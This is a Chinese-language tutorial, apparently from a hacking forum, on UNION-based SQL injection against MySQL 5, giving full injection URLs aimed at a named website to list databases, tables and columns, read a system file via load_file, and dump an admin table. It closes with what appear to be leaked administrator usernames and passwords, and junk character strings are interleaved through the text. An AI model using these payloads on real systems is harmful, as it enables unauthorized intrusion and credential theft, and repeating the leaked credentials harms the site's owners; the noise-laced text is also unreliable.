此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
5 ?; _' H. b5 Q. t! P: E- w6 W但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人+ ]: U' e* f. M. [% E/ M+ }
^2 R% n, p4 d6 j5 v- t# @ {& P% e- d7 ^3 c! ?# C" t1 l
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入; f7 H) ?) A Q) `7 ?8 Z
5 S3 u/ ~& x% Z- e$ [缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢... V( h" t. ~; `8 l& V2 H) ~
& M' @! u" V4 v7 ?, }, F下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示, l5 G' H k/ a, x6 _) L
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等
' B/ i) S6 D: @6 u9 C# _1 d! [" r1 P: u" s3 l# O
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17& n7 U' @, A& f- y8 |2 }& M
8 r. O; Y. z N/ n5 G读出所有库:7 G+ @2 L$ w9 [$ J
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA' v4 b5 X& Y8 L. j- E( s r
/ r: i. ~ J8 r! \3 B
- ]- e1 L7 @1 r! t. p: K
3 H7 \& U8 S6 @8 r4 U% t: z
读出所有表:
- A! |' E+ u7 X0 rhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
2 D! k9 [/ w( P1 @* _/ H2 P/ z. g" x4 ^7 R# p. M
读出所有表字段:# r" |' V5 u) T3 [8 I# E
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)* K! Y' ]" |, m% g" Y3 T
*/ (97,100,109,105,110)为admin的ascii码 依次类推
5 J0 {2 d$ D, J2 \3 m: U' o( y9 a0 q9 v+ y6 L
读出所有表字段里的内容:
: J7 A( ?9 S. T8 d5 Y% c& D/ Mhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
+ v# s1 X1 P3 }1 S" h+ v9 v* w& A! Q& k& q! ^
. s) K# X- j8 Z
+ z- U/ ~% b. d3 ~3 } G( |0 m/ h
* Q5 V' I+ ` [+ W% k
6 k1 i9 b" k, D0 n
2 Q n: I7 W. C, s6 Lhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23; U; T) Y0 N" C `, \" x: V
+ K* N" ?5 `5 V$ C4 p
: E* c1 r2 @: q, J% c' O6 hhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
/ |7 ~1 w: F( M' t: l# [# j+ Q5 v6 ~) I+ ~* n
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
7 ^8 J) R( ?) F5 w! O4 I7 w0 c/ j5 Q2 F
* O: V: c$ ] L6 B& G
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
[' J8 {. t! ]& u4 O0 r6 m" N& V) d/ }. H9 u4 v1 d
3 b. N# N8 q( n1 @4 N+ ?
webmaster:dzb521123,simlab:simadmin20043233
' {: ^( H* |5 e1 c1 T S |